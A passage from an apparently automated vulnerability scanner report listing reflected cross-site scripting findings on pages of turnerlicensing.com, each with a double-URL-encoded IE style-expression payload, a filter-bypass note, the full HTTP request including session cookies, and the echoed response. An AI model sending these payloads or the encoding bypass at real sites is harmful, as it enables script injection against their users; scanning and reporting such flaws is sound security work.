The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload bd71c%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527b08045fc3e2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bd71c'style='x:expression(alert(1))'b08045fc3e2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /teams_by_state/Alabama?bd71c%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527b08045fc3e2=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:51:52 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:51:52 GMT
NS_RTIMER_COMPOSITE: -109256382:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=981
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 110364


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Alabama</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</script>
<s
...[SNIP]...
nsing.com/s.nl?sc=77&category=175313&bd71c%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527b08045fc3e2=1&bd71c%27style%3d%27x%3aexpression%28alert%281%29%29%27b08045fc3e2=1&fromsla=T&bd71c'style='x:expression(alert(1))'b08045fc3e2=1'>
...[SNIP]...

2.185. http://www.turnerlicensing.com/teams_by_state/Alaska [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /teams_by_state/Alaska

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4d41a%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25275bce84a02ce was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4d41a'style='x:expression(alert(1))'5bce84a02ce in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /teams_by_state/Alaska?4d41a%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25275bce84a02ce=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:51:41 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:51:34 GMT
NS_RTIMER_COMPOSITE: 2001989218:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=948
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 76541


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Alaska</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</script>
<sc
...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?sc=77&category=260041&4d41a%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25275bce84a02ce=1&4d41a'style='x:expression(alert(1))'5bce84a02ce=1&4d41a%27style%3d%27x%3aexpression%28alert%281%29%29%275bce84a02ce=1&fromsla=T'>
...[SNIP]...

2.186. http://www.turnerlicensing.com/teams_by_state/Arizona [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /teams_by_state/Arizona

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload a0e30%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527d86d71a4401 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a0e30'style='x:expression(alert(1))'d86d71a4401 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /teams_by_state/Arizona?a0e30%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527d86d71a4401=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:51:47 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:51:45 GMT
NS_RTIMER_COMPOSITE: -2034791080:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=839
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 110717


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Arizona</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</script>
<s
...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?sc=77&category=175347&a0e30%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527d86d71a4401=1&a0e30'style='x:expression(alert(1))'d86d71a4401=1&fromsla=T&a0e30%27style%3d%27x%3aexpression%28alert%281%29%29%27d86d71a4401=1'>
...[SNIP]...

2.187. http://www.turnerlicensing.com/teams_by_state/Arkansas [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /teams_by_state/Arkansas

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 1396a%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25276e71f63c249 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1396a'style='x:expression(alert(1))'6e71f63c249 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /teams_by_state/Arkansas?1396a%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25276e71f63c249=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:51:47 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:51:45 GMT
NS_RTIMER_COMPOSITE: -259188253:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=974
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 110280


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Arkansas</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</script>
<
...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?sc=77&category=175348&1396a%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25276e71f63c249=1&1396a'style='x:expression(alert(1))'6e71f63c249=1&fromsla=T&1396a%27style%3d%27x%3aexpression%28alert%281%29%29%276e71f63c249=1'>
...[SNIP]...

2.188. http://www.turnerlicensing.com/teams_by_state/Calgary [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /teams_by_state/Calgary

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 7cdd3%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25278d075c1b2de was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7cdd3'style='x:expression(alert(1))'8d075c1b2de in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /teams_by_state/Calgary?7cdd3%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25278d075c1b2de=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:51:45 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:51:45 GMT
NS_RTIMER_COMPOSITE: 2001990455:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=842
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 98472


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Calgary</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</script>
<s
...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?sc=77&category=260059&7cdd3%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25278d075c1b2de=1&7cdd3'style='x:expression(alert(1))'8d075c1b2de=1&7cdd3%27style%3d%27x%3aexpression%28alert%281%29%29%278d075c1b2de=1&fromsla=T'>
...[SNIP]...

2.189. http://www.turnerlicensing.com/teams_by_state/California [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /teams_by_state/California

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload e8313%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252773dad229e98 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e8313'style='x:expression(alert(1))'73dad229e98 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /teams_by_state/California?e8313%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252773dad229e98=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:51:50 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:51:45 GMT
NS_RTIMER_COMPOSITE: -1590889426:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=824
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 111521


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>California</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</script>
...[SNIP]...
turnerlicensing.com/s.nl?sc=77&category=175355&e8313%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252773dad229e98=1&e8313%27style%3d%27x%3aexpression%28alert%281%29%29%2773dad229e98=1&e8313'style='x:expression(alert(1))'73dad229e98=1&fromsla=T'>
...[SNIP]...

2.190. http://www.turnerlicensing.com/teams_by_state/Colorado [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /teams_by_state/Colorado

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 43f2c%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252725987bedbdc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 43f2c'style='x:expression(alert(1))'25987bedbdc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /teams_by_state/Colorado?43f2c%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252725987bedbdc=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:51:55 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:51:52 GMT
NS_RTIMER_COMPOSITE: 334644940:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=960
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 110761


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Colorado</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</script>
<
...[SNIP]...
turnerlicensing.com/s.nl?sc=77&category=175356&43f2c%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252725987bedbdc=1&43f2c%27style%3d%27x%3aexpression%28alert%281%29%29%2725987bedbdc=1&43f2c'style='x:expression(alert(1))'25987bedbdc=1&fromsla=T'>
...[SNIP]...

2.191. http://www.turnerlicensing.com/teams_by_state/Connecticut [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /teams_by_state/Connecticut

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 6b72d%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527146d7de1dc2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6b72d'style='x:expression(alert(1))'146d7de1dc2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /teams_by_state/Connecticut?6b72d%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527146d7de1dc2=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:51:42 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:51:34 GMT
NS_RTIMER_COMPOSITE: 1666343690:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=984
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 81996


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Connecticut</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</script
...[SNIP]...
nsing.com/s.nl?sc=77&category=175359&6b72d%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527146d7de1dc2=1&6b72d%27style%3d%27x%3aexpression%28alert%281%29%29%27146d7de1dc2=1&fromsla=T&6b72d'style='x:expression(alert(1))'146d7de1dc2=1'>
...[SNIP]...

2.192. http://www.turnerlicensing.com/teams_by_state/Delaware [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /teams_by_state/Delaware

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload e8bba%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527f6b9aaa7370 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e8bba'style='x:expression(alert(1))'f6b9aaa7370 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /teams_by_state/Delaware?e8bba%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527f6b9aaa7370=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:51:39 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:51:34 GMT
NS_RTIMER_COMPOSITE: 328749590:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=986
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 54505


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Delaware</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</script>
<
...[SNIP]...
nsing.com/s.nl?sc=77&category=175361&e8bba%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527f6b9aaa7370=1&e8bba%27style%3d%27x%3aexpression%28alert%281%29%29%27f6b9aaa7370=1&fromsla=T&e8bba'style='x:expression(alert(1))'f6b9aaa7370=1'>
...[SNIP]...

2.193. http://www.turnerlicensing.com/teams_by_state/Edmonton [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /teams_by_state/Edmonton

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload dbb0f%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527eba22f9b445 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as dbb0f'style='x:expression(alert(1))'eba22f9b445 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /teams_by_state/Edmonton?dbb0f%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527eba22f9b445=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:51:44 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:51:43 GMT
NS_RTIMER_COMPOSITE: 1114188816:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=944
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 87520


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Edmonton</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</script>
<
...[SNIP]...
